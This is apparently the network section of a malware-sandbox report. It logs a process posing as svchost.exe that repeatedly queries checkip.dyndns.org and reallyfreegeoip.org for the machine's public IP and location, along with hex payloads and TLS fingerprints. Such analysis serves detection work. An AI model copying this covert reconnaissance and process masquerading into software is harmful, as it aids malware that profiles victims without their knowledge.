                                      X-Request-ID: 2da0422689acb4b67cda7287b8f02a33
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:53.140341043 CEST | 127 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:53.756190062 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:53 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 17474eebdaf53caf6eac3d5f973d090d
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:24.493671894 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:25.104382038 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e1b77715ae9f6e48a8bfe1d501a4d955
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:25.773118019 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:26.399452925 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:26 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: f29f79b39c31ff8e5bf88e3f162cf36c
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49740 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:27.008814096 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:27.642046928 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:27 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 6c8d0c1789a073c92d7ed114fe217023
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49742 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:28.282684088 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:28.918694019 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:28 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 1ba81e01a8be9ffa79c16fee9989c482
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49745 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:29.547746897 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:30.161107063 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:30 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cf8a16373ff7755a68d3e3f98e073281
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49747 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:35:30.856669903 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:31.458009958 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e655849517cab7d7d8868b0a30b5257e
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                      Jul 25, 2024 03:35:24.250891924 CEST | 188.114.97.3 | 443 | 192.168.2.5 | 49733 | CN=reallyfreegeoip.org | CN=WE1, O=Google Trust Services, C=US | Thu Jul 04 23:28:37 CEST 2024 | Wed Oct 02 23:28:36 CEST 2024 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
                                      (chain) | | | | | CN=WE1, O=Google Trust Services, C=US | CN=GTS Root R4, O=Google Trust Services LLC, C=US | Wed Dec 13 10:00:00 CET 2023 | Tue Feb 20 15:00:00 CET 2029 | |
                                      (chain) | | | | | CN=GTS Root R4, O=Google Trust Services LLC, C=US | CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE | Wed Nov 15 04:43:21 CET 2023 | Fri Jan 28 01:00:42 CET 2028 | |
                                      Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49705 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:36 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:37 UTC | 691 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:37 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: MISS
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXxksWmmaUlY6L9FpfNl68IgGKwx1GBFryvim9ccehgYoeCRnGR5ZCGPGCwFC%2Bpo4GEwAJxTpghWjrwnl2Oh2IXQOHcn7YFvXm5WuVs3sy3VCgvHOP75OrAjabILLWCmSVVh9Xti"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868987f8a7298-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:37 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49706 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:37 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:38 UTC | 700 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:38 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 1
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FTRLQQzScfAJvUitUS0Cu0zNOWwjX7GMytkN0ookJXALgAco8AuQMux%2BFzaOI0Rsro05xok05Vq11Aj1ghFMKbclWwFN6I7%2F7sIb7IpCNY5HPlBO1KjLFWv3R5FGLuhqprqZNcW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a88689fc95f42e4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:38 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:39 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:39 UTC | 708 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:39 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 2
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86KDjlvtVLgo1wqOrS4hQzMyRfub3UkjpooMimVw0RnHMPGUBQFF7tX9gRX5KE9KE%2FV%2FA8B7NzA%2BuvCMK9FLFgdEl9ym%2B1BOT6hk7ED%2F2fSqSy2sUDehmdz3serdz%2BPFUsDOKV09"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868a7ca3e7cff-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:39 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:40 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:40 UTC | 702 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:40 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 3
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FwANF3HO%2BqxJL27rAf8MclRerEzUqXdbLE6jTvzln%2F77%2BpS6Af4osBNsjpGKwdRIRSEWF4wJPLDqUlIR5BYvcE8IcRzWiD7Y8fXJJryk6wxX9XvKW64Vx7u1lTtDqJQwGXNSDbF"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868b03f6c43d6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:40 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49712 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:41 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:42 UTC | 710 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:41 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 4
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3k8TIH6ivhN10cgM8pLnG78m55%2BxQhaO6hFfqO8%2BFwLiYxzJU3RH38EMNB7rdLQU5yFTtf%2B%2BjZAdKyDx2iXxPZ9mbTSoFV9yAxfwarCfonW2x5MqD7%2F9Epz0C9bTJU2p3sUBV%2Fs"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868b848815e6d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:42 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49714 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:34:43 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:43 UTC | 704 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:43 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 6
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RadzYhpDl%2BjVkMHMc38G0z6rebXTvjtHN3tcBSzHrojpRLAzHdAnG5%2FTmclVx34RpXhevmGsbj%2FqoIQzZQIpPljviVFWkMlWKdGxML%2Fy7EYmhTAsw0PIdSigBIDH4jI6T5NJCZwy"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868c02eb0437a-EWR
                                      alt-svc: h3=":443"; ma=86400
